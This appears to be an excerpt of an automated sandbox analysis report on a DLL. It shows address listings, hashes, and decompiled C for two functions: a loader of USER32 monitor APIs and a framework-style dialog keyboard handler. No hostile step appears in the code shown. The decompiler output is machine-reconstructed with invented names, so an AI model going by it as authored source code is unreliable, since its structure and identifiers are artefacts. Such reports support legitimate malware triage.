                                                                                                                                    0x1002dd4e
                                                                                                                                    0x1002dd50
                                                                                                                                    0x1002dd50
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dd55
                                                                                                                                    0x1002dd59
                                                                                                                                    0x1002dd5c
                                                                                                                                    0x1002dd5f
                                                                                                                                    0x1002dd61
                                                                                                                                    0x1002dd62
                                                                                                                                    0x1002dd63
                                                                                                                                    0x1002dd64
                                                                                                                                    0x1002dd65
                                                                                                                                    0x1002dd68
                                                                                                                                    0x1002dd6a
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dcfd
                                                                                                                                    0x1002dcfd
                                                                                                                                    0x1002dd00
                                                                                                                                    0x1002dd02
                                                                                                                                    0x1002dd04
                                                                                                                                    0x1002dd05
                                                                                                                                    0x1002dd08
                                                                                                                                    0x1002dd0b
                                                                                                                                    0x1002dd10
                                                                                                                                    0x1002dd13
                                                                                                                                    0x1002dd17
                                                                                                                                    0x1002dd1d
                                                                                                                                    0x1002dd21
                                                                                                                                    0x1002dd23
                                                                                                                                    0x1002dd29
                                                                                                                                    0x1002dd29
                                                                                                                                    0x1002dd2c
                                                                                                                                    0x1002dd2f
                                                                                                                                    0x1002dd32
                                                                                                                                    0x1002dd37
                                                                                                                                    0x1002dd3b
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dd3b
                                                                                                                                    0x1002dd25
                                                                                                                                    0x1002dd27
                                                                                                                                    0x1002dcf8
                                                                                                                                    0x1002dcf8
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dcf8
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dc6e
                                                                                                                                    0x1002dc71
                                                                                                                                    0x1002dc75
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dc89
                                                                                                                                    0x1002dc8c
                                                                                                                                    0x1002dc8f
                                                                                                                                    0x1002dc92
                                                                                                                                    0x1002dc92
                                                                                                                                    0x1002dc95
                                                                                                                                    0x1002dc95
                                                                                                                                    0x1002dc97
                                                                                                                                    0x1002dc9c
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dc67
                                                                                                                                    0x1002ddcf
                                                                                                                                    0x1002ddcf
                                                                                                                                    0x1002ddd3
                                                                                                                                    0x1002ddd6
                                                                                                                                    0x1002dddf
                                                                                                                                    0x1002dddf
                                                                                                                                    0x1002dde8
                                                                                                                                    0x00000000
                                                                                                                                    0x1002dde8

                                                                                                                                    APIs
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4128688680-0
                                                                                                                                    • Opcode ID: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                                    • Instruction ID: 42fa242583032f4c72b1ee8c19c4a820194bcb4b4a787a5525753aa98076571e
                                                                                                                                    • Opcode Fuzzy Hash: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                                    • Instruction Fuzzy Hash: 5EF18A7490025ADFDF11DFA8D880AEEBBB4FF05300F90406AE951AB2A1D774AE56CF50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 10018B59 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 77libraryloaderCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                    			E10018B59() {
				void* __ebx;
				void* __esi;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				_Unknown_base(*)()* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t18;
				void* _t20;
				intOrPtr _t23;
				_Unknown_base(*)()* _t24;

				_t23 =  *0x100572e4; // 0x0
				if(_t23 == 0) {
					_push(_t20);
					 *0x100572e8 = E10018B01(0, _t20, __eflags);
					_t18 = GetModuleHandleA("USER32");
					__eflags = _t18;
					if(_t18 == 0) {
						L12:
						 *0x100572c8 = 0;
						 *0x100572cc = 0;
						 *0x100572d0 = 0;
						 *0x100572d4 = 0;
						 *0x100572d8 = 0;
						 *0x100572dc = 0;
						 *0x100572e0 = 0;
						_t5 = 0;
					} else {
						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
						__eflags = _t6;
						 *0x100572c8 = _t6;
						if(_t6 == 0) {
							goto L12;
						} else {
							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
							__eflags = _t7;
							 *0x100572cc = _t7;
							if(_t7 == 0) {
								goto L12;
							} else {
								_t8 = GetProcAddress(_t18, "MonitorFromRect");
								__eflags = _t8;
								 *0x100572d0 = _t8;
								if(_t8 == 0) {
									goto L12;
								} else {
									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
									__eflags = _t9;
									 *0x100572d4 = _t9;
									if(_t9 == 0) {
										goto L12;
									} else {
										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
										__eflags = _t10;
										 *0x100572dc = _t10;
										if(_t10 == 0) {
											goto L12;
										} else {
											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
											__eflags = _t11;
											 *0x100572d8 = _t11;
											if(_t11 == 0) {
												goto L12;
											} else {
												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
												__eflags = _t12;
												 *0x100572e0 = _t12;
												if(_t12 == 0) {
													goto L12;
												} else {
													_t5 = 1;
													__eflags = 1;
												}
											}
										}
									}
								}
							}
						}
					}
					 *0x100572e4 = 1;
					return _t5;
				} else {
					_t24 =  *0x100572d8; // 0x0
					return 0 | _t24 != 0x00000000;
				}
			}

















                                                                                                                                    0x10018b5c
                                                                                                                                    0x10018b62
                                                                                                                                    0x10018b71
                                                                                                                                    0x10018b7d
                                                                                                                                    0x10018b88
                                                                                                                                    0x10018b8a
                                                                                                                                    0x10018b8c
                                                                                                                                    0x10018c20
                                                                                                                                    0x10018c20
                                                                                                                                    0x10018c26
                                                                                                                                    0x10018c2c
                                                                                                                                    0x10018c32
                                                                                                                                    0x10018c38
                                                                                                                                    0x10018c3e
                                                                                                                                    0x10018c44
                                                                                                                                    0x10018c4a
                                                                                                                                    0x10018b92
                                                                                                                                    0x10018b9e
                                                                                                                                    0x10018ba0
                                                                                                                                    0x10018ba2
                                                                                                                                    0x10018ba7
                                                                                                                                    0x00000000
                                                                                                                                    0x10018ba9
                                                                                                                                    0x10018baf
                                                                                                                                    0x10018bb1
                                                                                                                                    0x10018bb3
                                                                                                                                    0x10018bb8
                                                                                                                                    0x00000000
                                                                                                                                    0x10018bba
                                                                                                                                    0x10018bc0
                                                                                                                                    0x10018bc2
                                                                                                                                    0x10018bc4
                                                                                                                                    0x10018bc9
                                                                                                                                    0x00000000
                                                                                                                                    0x10018bcb
                                                                                                                                    0x10018bd1
                                                                                                                                    0x10018bd3
                                                                                                                                    0x10018bd5
                                                                                                                                    0x10018bda
                                                                                                                                    0x00000000
                                                                                                                                    0x10018bdc
                                                                                                                                    0x10018be2
                                                                                                                                    0x10018be4
                                                                                                                                    0x10018be6
                                                                                                                                    0x10018beb
                                                                                                                                    0x00000000
                                                                                                                                    0x10018bed
                                                                                                                                    0x10018bf3
                                                                                                                                    0x10018bf5
                                                                                                                                    0x10018bf7
                                                                                                                                    0x10018bfc
                                                                                                                                    0x00000000
                                                                                                                                    0x10018bfe
                                                                                                                                    0x10018c04
                                                                                                                                    0x10018c06
                                                                                                                                    0x10018c08
                                                                                                                                    0x10018c0d
                                                                                                                                    0x00000000
                                                                                                                                    0x10018c0f
                                                                                                                                    0x10018c11
                                                                                                                                    0x10018c11
                                                                                                                                    0x10018c11
                                                                                                                                    0x10018c0d
                                                                                                                                    0x10018bfc
                                                                                                                                    0x10018beb
                                                                                                                                    0x10018bda
                                                                                                                                    0x10018bc9
                                                                                                                                    0x10018bb8
                                                                                                                                    0x10018ba7
                                                                                                                                    0x10018c14
                                                                                                                                    0x10018c1f
                                                                                                                                    0x10018b64
                                                                                                                                    0x10018b66
                                                                                                                                    0x10018b70
                                                                                                                                    0x10018b70

                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,754A7F34,10018CA5,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B82
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B9E
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BAF
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BC0
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BD1
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BE2
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BF3
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018C04
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                    • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                                    • API String ID: 667068680-68207542
                                                                                                                                    • Opcode ID: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                                    • Instruction ID: 77f58ff47d83721d02e0aa712f7cb6554a3c60b1de10c844b6b889dbd48dd915
                                                                                                                                    • Opcode Fuzzy Hash: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                                    • Instruction Fuzzy Hash: 40213071902121AAE751DF25ADC046DBAEAF349280F61093FF10CD6560D7309AC6AFA9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1002A778 Relevance: 26.0, APIs: 17, Instructions: 452windowkeyboardCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                    			E1002A778(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v24;
				int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				struct HWND__* _v52;
				signed int _t139;
				signed int _t141;
				void* _t142;
				signed int _t146;
				signed int _t149;
				intOrPtr _t150;
				signed int _t152;
				signed char _t153;
				signed int _t154;
				signed int _t155;
				int _t156;
				signed int _t161;
				signed int _t165;
				void* _t167;
				signed char _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				signed char _t182;
				intOrPtr _t183;
				signed int _t184;
				short _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t195;
				signed int _t198;
				signed char _t199;
				signed int _t200;
				signed int _t201;
				short _t204;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				void* _t211;
				signed int _t215;
				signed int _t216;
				struct HWND__* _t217;
				struct tagMSG* _t221;
				intOrPtr _t224;
				void* _t231;
				struct tagMSG* _t240;
				signed int _t242;
				int _t243;
				signed int _t244;
				long _t247;
				intOrPtr _t249;
				signed int _t251;
				signed int _t254;
				signed int _t255;
				signed int _t256;
				signed int _t257;
				signed int _t258;
				void* _t260;
				void* _t262;

				_t232 = __ecx;
				_t260 = _t262;
				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t139 = E1002A5D5(_a4, _a8);
				_t238 = _t139;
				if(_t139 == 0) {
					_t232 = _a4;
					_t231 = E100199B2(_a4);
					if(_t231 != 0) {
						_t221 =  *((intOrPtr*)(_t231 + 0x44));
						_a8 = _t221;
						if(_t221 != 0) {
							while(1) {
								_t9 = _t231 + 0x40; // 0x40
								_t232 = _t9;
								_t258 =  *(E10017B95( &_a8));
								_t224 =  *((intOrPtr*)(_t258 + 4));
								if(_t224 != 0 && _t224 ==  *((intOrPtr*)(_t231 + 0x70))) {
									break;
								}
								if( *_t258 == 0 ||  *_t258 != GetFocus()) {
									if(_a8 != 0) {
										continue;
									} else {
									}
								} else {
									break;
								}
								goto L10;
							}
							_t238 = _t258;
						}
					}
				}
				L10:
				_t247 = 0;
				while(1) {
					_t238 = E1002A627(_t232, _a4, _t238, _a12);
					if(_t238 == 0) {
						break;
					}
					_t142 = E1002A0D2(_t238);
					_pop(_t232);
					if(_t142 == 0) {
						L14:
						if(_t238 == 0) {
							L21:
							__eflags =  *(_t238 + 4);
							if( *(_t238 + 4) == 0) {
								E100201F1(_t232);
								asm("int3");
								_push(0x28);
								E10030D5A(E10044D1A, 0, _t238, _t247);
								_t146 = _a4;
								__eflags = _t146;
								if(_t146 != 0) {
									_v48 =  *((intOrPtr*)(_t146 + 0x20));
								} else {
									_v48 = _v48 & _t146;
								}
								_t240 = _a8;
								_t249 = _t240->message;
								_v32 = _t249;
								_v52 = GetFocus();
								_t149 = E1001B042(0, _t260, _t148);
								_t229 = 0x100;
								__eflags = _t249 - 0x100;
								_v24 = _t149;
								if(_t249 < 0x100) {
									L34:
									__eflags = _t249 + 0xfffffe00 - 9;
									if(_t249 + 0xfffffe00 > 9) {
										goto L56;
									} else {
										goto L35;
									}
								} else {
									__eflags = _t249 - 0x109;
									if(_t249 <= 0x109) {
										L35:
										__eflags = _t149;
										if(_t149 == 0) {
											L56:
											_t251 = 0;
											_v28 = 0;
											_t150 = E1001B042(_t229, _t260,  *_t240);
											_v44 = _v44 & 0;
											_v36 = _t150;
											_t152 = _v32 - _t229;
											__eflags = _t152;
											_v40 = 2;
											if(_t152 == 0) {
												_t153 = E1002A085(_v36, _t240);
												_t232 =  *(_t240 + 8) & 0x0000ffff;
												__eflags = _t232 - 0x1b;
												if(__eflags > 0) {
													__eflags = _t232 - 0x25;
													if(_t232 < 0x25) {
														goto L75;
													} else {
														__eflags = _t232 - 0x26;
														if(_t232 <= 0x26) {
															_v44 = 1;
															goto L110;
														} else {
															__eflags = _t232 - 0x28;
															if(_t232 <= 0x28) {
																L110:
																_t171 = E1002A085(_v24, _t240);
																__eflags = _t171 & 0x00000001;
																if((_t171 & 0x00000001) != 0) {
																	goto L75;
																} else {
																	__eflags = _v44;
																	_t232 = _a4;
																	_push(0);
																	if(_v44 == 0) {
																		_t172 = E1001E706(_t232);
																	} else {
																		_t172 = E1001E6B8(_t232);
																	}
																	_t254 = _t172;
																	__eflags = _t254;
																	if(_t254 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t254 + 8);
																		if( *(_t254 + 8) != 0) {
																			_t232 = _a4;
																			E1001E262(_a4, _t254);
																		}
																		__eflags =  *(_t254 + 4);
																		if( *(_t254 + 4) == 0) {
																			_t173 =  *_t254;
																			__eflags = _t173;
																			if(_t173 == 0) {
																				_t232 = _a4;
																				_t174 = E1002A143(_a4, _v24, _v44);
																			} else {
																				_t174 = E1001B042(_t229, _t260, _t173);
																			}
																			_t242 = _t174;
																			__eflags = _t242;
																			if(_t242 == 0) {
																				goto L75;
																			} else {
																				_t229 = 0;
																				 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x4c)) + 0x70)) = 0;
																				E1002A17D(_t242);
																				__eflags =  *(_t254 + 8);
																				if( *(_t254 + 8) != 0) {
																					SendMessageA( *(_t242 + 0x20), 0xf1, 1, 0);
																				}
																				goto L125;
																			}
																		} else {
																			_t232 =  *(_t254 + 4);
																			 *((intOrPtr*)( *( *(_t254 + 4)) + 0xac))(_t240);
																			goto L125;
																		}
																	}
																}
															} else {
																__eflags = _t232 - 0x2b;
																if(_t232 != 0x2b) {
																	goto L75;
																} else {
																	goto L97;
																}
															}
														}
													}
													goto L126;
												} else {
													if(__eflags == 0) {
														L103:
														_t243 = 0;
														__eflags = 0;
														goto L104;
													} else {
														__eflags = _t232 - 3;
														if(_t232 == 3) {
															goto L103;
														} else {
															__eflags = _t232 - 9;
															if(_t232 == 9) {
																__eflags = _t153 & 0x00000002;
																if((_t153 & 0x00000002) != 0) {
																	goto L75;
																} else {
																	_t188 = GetKeyState(0x10);
																	_t255 = _a4;
																	__eflags = _t188;
																	_t229 = 0 | _t188 < 0x00000000;
																	_t232 = _t255;
																	_t189 = E1001E11F(_t255, 0, _t188 < 0);
																	__eflags = _t189;
																	if(_t189 == 0) {
																		goto L75;
																	} else {
																		__eflags =  *(_t189 + 4);
																		if( *(_t189 + 4) == 0) {
																			_t190 =  *_t189;
																			__eflags = _t190;
																			if(_t190 == 0) {
																				_t232 = _t255;
																				_t191 = E10016D48(_t255, _v36, _t229);
																			} else {
																				_t191 = E1001B042(_t229, _t260, _t190);
																			}
																			_t244 = _t191;
																			__eflags = _t244;
																			if(_t244 != 0) {
																				 *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) =  *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) & 0x00000000;
																				E1002A17D(_t244);
																				E1002A347(_t229, _t232, _t260, _v24, _t244);
																				_pop(_t232);
																			}
																		} else {
																			_t195 =  *(_t189 + 4);
																			_t232 = _t195;
																			 *((intOrPtr*)( *_t195 + 0xac))(_t240);
																		}
																		goto L125;
																	}
																}
																goto L126;
															} else {
																__eflags = _t232 - 0xd;
																if(_t232 == 0xd) {
																	L97:
																	__eflags = _t153 & 0x00000004;
																	if((_t153 & 0x00000004) != 0) {
																		goto L75;
																	} else {
																		_t182 = E1002A122(_v24);
																		__eflags = _t182 & 0x00000010;
																		_pop(_t232);
																		if((_t182 & 0x00000010) == 0) {
																			_t183 = E1002A4C8(_a4);
																		} else {
																			_t251 = _v24;
																			_t232 = _t251;
																			_t183 = E1001DE35(_t251);
																		}
																		_t243 = 0;
																		__eflags = _t251;
																		_v40 = _t183;
																		if(_t251 != 0) {
																			L105:
																			_t232 = _t251;
																			_t184 = E1001DEAF(_t251);
																			__eflags = _t184;
																			if(_t184 != 0) {
																				__eflags =  *((intOrPtr*)(_t251 + 0x50)) - _t243;
																				if( *((intOrPtr*)(_t251 + 0x50)) == _t243) {
																					goto L75;
																				} else {
																					_push(_t243);
																					_push(_t243);
																					_push(_t243);
																					_push(1);
																					_push(0xfffffdd9);
																					_push(_t251);
																					_v8 = _t243;
																					E1001DF0C();
																					_v8 = _v8 | 0xffffffff;
																					goto L125;
																				}
																			} else {
																				MessageBeep(_t243);
																				goto L75;
																			}
																		} else {
																			L104:
																			_t251 = E1002A3C2(_a4, _v40);
																			__eflags = _t251 - _t243;
																			if(_t251 == _t243) {
																				goto L75;
																			} else {
																				goto L105;
																			}
																		}
																	}
																	goto L126;
																} else {
																	goto L75;
																}
															}
														}
													}
												}
												goto L79;
											} else {
												_t198 = _t152;
												__eflags = _t198;
												if(_t198 == 0) {
													L62:
													_t199 = E1002A085(_v36, _t240);
													__eflags = _v32 - 0x102;
													if(_v32 != 0x102) {
														L64:
														_t232 =  *(_t240 + 8) & 0x0000ffff;
														__eflags = _t232 - 9;
														if(_t232 != 9) {
															L66:
															__eflags = _t232 - 0x20;
															if(__eflags == 0) {
																goto L54;
															} else {
																_push(_t240);
																_t200 = E1002A778(_t229, _t232, _t240, _t251, __eflags, _a4, _v36);
																__eflags = _t200;
																if(_t200 == 0) {
																	goto L75;
																} else {
																	_t201 =  *(_t200 + 4);
																	__eflags = _t201;
																	if(_t201 == 0) {
																		goto L75;
																	} else {
																		_t232 = _t201;
																		E100246E1(_t201, _t240);
																		L125:
																		_v28 = 1;
																	}
																}
																goto L79;
															}
														} else {
															__eflags = _t199 & 0x00000002;
															if((_t199 & 0x00000002) != 0) {
																goto L75;
															} else {
																goto L66;
															}
														}
													} else {
														__eflags = _t199 & 0x00000084;
														if((_t199 & 0x00000084) != 0) {
															goto L75;
														} else {
															goto L64;
														}
													}
												} else {
													__eflags = _t198 != 4;
													if(_t198 != 4) {
														L75:
														_t154 = _a4;
														__eflags =  *(_t154 + 0x3c) & 0x00001000;
														if(( *(_t154 + 0x3c) & 0x00001000) == 0) {
															_t165 = IsDialogMessageA( *(_t154 + 0x20), _a8);
															__eflags = _t165;
															_v28 = _t165;
															if(_t165 != 0) {
																_t167 = E1001B042(_t229, _t260, GetFocus());
																__eflags = _t167 - _v24;
																if(_t167 != _v24) {
																	E1002A2DA(_t232, E1001B042(_t229, _t260, GetFocus()));
																	_pop(_t232);
																}
															}
														}
														L79:
														_t155 = IsWindow(_v52);
														__eflags = _t155;
														if(_t155 != 0) {
															E1002A347(_t229, _t232, _t260, _v24, E1001B042(_t229, _t260, GetFocus()));
															_t161 = IsWindow(_v48);
															__eflags = _t161;
															if(_t161 != 0) {
																E1002A4F5(_a4, _v24, E1001B042(_t229, _t260, GetFocus()));
															}
														}
														_t156 = _v28;
													} else {
														__eflags = _v24;
														if(_v24 != 0) {
															L61:
															__eflags =  *(_t240 + 8) - 0x20;
															if( *(_t240 + 8) == 0x20) {
																goto L75;
															} else {
																goto L62;
															}
														} else {
															_t204 = GetKeyState(0x12);
															__eflags = _t204;
															if(_t204 >= 0) {
																goto L75;
															} else {
																goto L61;
															}
														}
													}
												}
											}
										} else {
											_t256 = _t149;
											while(1) {
												__eflags =  *(_t256 + 0x50);
												if( *(_t256 + 0x50) != 0) {
													break;
												}
												_t211 = E1001B042(_t229, _t260, GetParent( *(_t256 + 0x20)));
												__eflags = _t211 - _a4;
												if(_t211 != _a4) {
													_t256 = E1001B042(_t229, _t260, GetParent( *(_t256 + 0x20)));
													__eflags = _t256;
													if(_t256 != 0) {
														continue;
													}
												}
												break;
											}
											__eflags = _t256;
											if(_t256 == 0) {
												L45:
												__eflags = _v32 - 0x101;
												if(_v32 == 0x101) {
													L48:
													__eflags = _t256;
													if(_t256 == 0) {
														goto L55;
													} else {
														_t257 =  *(_t256 + 0x50);
														__eflags = _t257;
														if(_t257 == 0) {
															goto L55;
														} else {
															_t206 = _a8->wParam & 0x0000ffff;
															__eflags = _t206 - 0xd;
															if(_t206 != 0xd) {
																L52:
																__eflags = _t206 - 0x1b;
																if(_t206 != 0x1b) {
																	goto L55;
																} else {
																	__eflags =  *(_t257 + 0x84) & 0x00000002;
																	if(( *(_t257 + 0x84) & 0x00000002) == 0) {
																		goto L55;
																	} else {
																		goto L54;
																	}
																}
															} else {
																__eflags =  *(_t257 + 0x84) & 0x00000001;
																if(( *(_t257 + 0x84) & 0x00000001) != 0) {
																	L54:
																	_t156 = 0;
																} else {
																	goto L52;
																}
															}
														}
													}
												} else {
													__eflags = _v32 - _t229;
													if(_v32 == _t229) {
														goto L48;
													} else {
														__eflags = _v32 - 0x102;
														if(_v32 != 0x102) {
															L55:
															_t240 = _a8;
															goto L56;
														} else {
															goto L48;
														}
													}
												}
											} else {
												_t207 =  *(_t256 + 0x50);
												__eflags = _t207;
												if(_t207 == 0) {
													goto L45;
												} else {
													__eflags =  *(_t207 + 0x58);
													if( *(_t207 + 0x58) == 0) {
														goto L45;
													} else {
														_t208 =  *(_t207 + 0x58);
														_t232 =  *_t208;
														_t209 =  *((intOrPtr*)( *_t208 + 0x14))(_t208, _a8);
														__eflags = _t209;
														if(_t209 != 0) {
															goto L45;
														} else {
															_t156 = _t209 + 1;
														}
													}
												}
											}
										}
									} else {
										goto L34;
									}
								}
								return E10030DFF(_t156);
							} else {
								_t232 =  *(_t238 + 4);
								_t215 =  *((intOrPtr*)( *( *(_t238 + 4)) + 0x78))();
								__eflags = _t215 & 0x08000000;
								if((_t215 & 0x08000000) == 0) {
									goto L20;
								} else {
									goto L23;
								}
							}
						} else {
							_t216 =  *(_t238 + 4);
							if(_t216 == 0) {
								_t217 =  *_t238;
							} else {
								_t217 =  *(_t216 + 0x24);
							}
							if(_t217 == 0) {
								goto L21;
							} else {
								if(IsWindowEnabled(_t217) == 0) {
									L23:
									__eflags = _t238 - _v8;
									if(_t238 == _v8) {
										break;
									} else {
										__eflags = _v8;
										if(_v8 == 0) {
											_v8 = _t238;
										}
										_t247 = _t247 + 1;
										__eflags = _t247 - 0x200;
										if(_t247 < 0x200) {
											continue;
										} else {
											break;
										}
									}
								} else {
									L20:
									_t141 = _t238;
									L28:
									return _t141;
								}
							}
						}
					} else {
						_t232 = _a4;
						_t238 = E1001E11F(_a4, _t238, 0);
						if(_t238 == 0) {
							break;
						} else {
							goto L14;
						}
					}
					L126:
				}
				_t141 = 0;
				__eflags = 0;
				goto L28;
			}




































































                                                                                                                                    0x1002a778
                                                                                                                                    0x1002a779
                                                                                                                                    0x1002a77b
                                                                                                                                    0x1002a77c
                                                                                                                                    0x1002a780
                                                                                                                                    0x1002a781
                                                                                                                                    0x1002a782
                                                                                                                                    0x1002a789
                                                                                                                                    0x1002a78e
                                                                                                                                    0x1002a792
                                                                                                                                    0x1002a794
                                                                                                                                    0x1002a79c
                                                                                                                                    0x1002a7a0
                                                                                                                                    0x1002a7a2
                                                                                                                                    0x1002a7a7
                                                                                                                                    0x1002a7aa
                                                                                                                                    0x1002a7ac
                                                                                                                                    0x1002a7b0
                                                                                                                                    0x1002a7b0
                                                                                                                                    0x1002a7b8
                                                                                                                                    0x1002a7ba
                                                                                                                                    0x1002a7bf
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a7c9
                                                                                                                                    0x1002a7d9
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a7db
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a7c9
                                                                                                                                    0x1002a7dd
                                                                                                                                    0x1002a7dd
                                                                                                                                    0x1002a7aa
                                                                                                                                    0x1002a7a0
                                                                                                                                    0x1002a7df
                                                                                                                                    0x1002a7df
                                                                                                                                    0x1002a7e1
                                                                                                                                    0x1002a7ed
                                                                                                                                    0x1002a7f3
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x1002a7f6
                                                                                                                                    0x1002a7fd
                                                                                                                                    0x1002a7fe
                                                                                                                                    0x1002a810
                                                                                                                                    0x1002a812
                                                                                                                                    0x1002a835
                                                                                                                                    0x1002a835
                                                                                                                                    0x1002a838
                                                                                                                                    0x1002a868
                                                                                                                                    0x1002a86d
                                                                                                                                    0x1002a86e
                                                                                                                                    0x1002a875
                                                                                                                                    0x1002a87a
                                                                                                                                    0x1002a87d
                                                                                                                                    0x1002a87f
                                                                                                                                    0x1002a889
                                                                                                                                    0x1002a881
                                                                                                                                    0x1002a881
                                                                                                                                    0x1002a881
                                                                                                                                    0x1002a88c
                                                                                                                                    0x1002a88f
                                                                                                                                    0x1002a892
                                                                                                                                    0x1002a89c
                                                                                                                                    0x1002a89f
                                                                                                                                    0x1002a8a4
                                                                                                                                    0x1002a8a9
                                                                                                                                    0x1002a8ab
                                                                                                                                    0x1002a8ae
                                                                                                                                    0x1002a8b8
                                                                                                                                    0x1002a8be
                                                                                                                                    0x1002a8c1
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
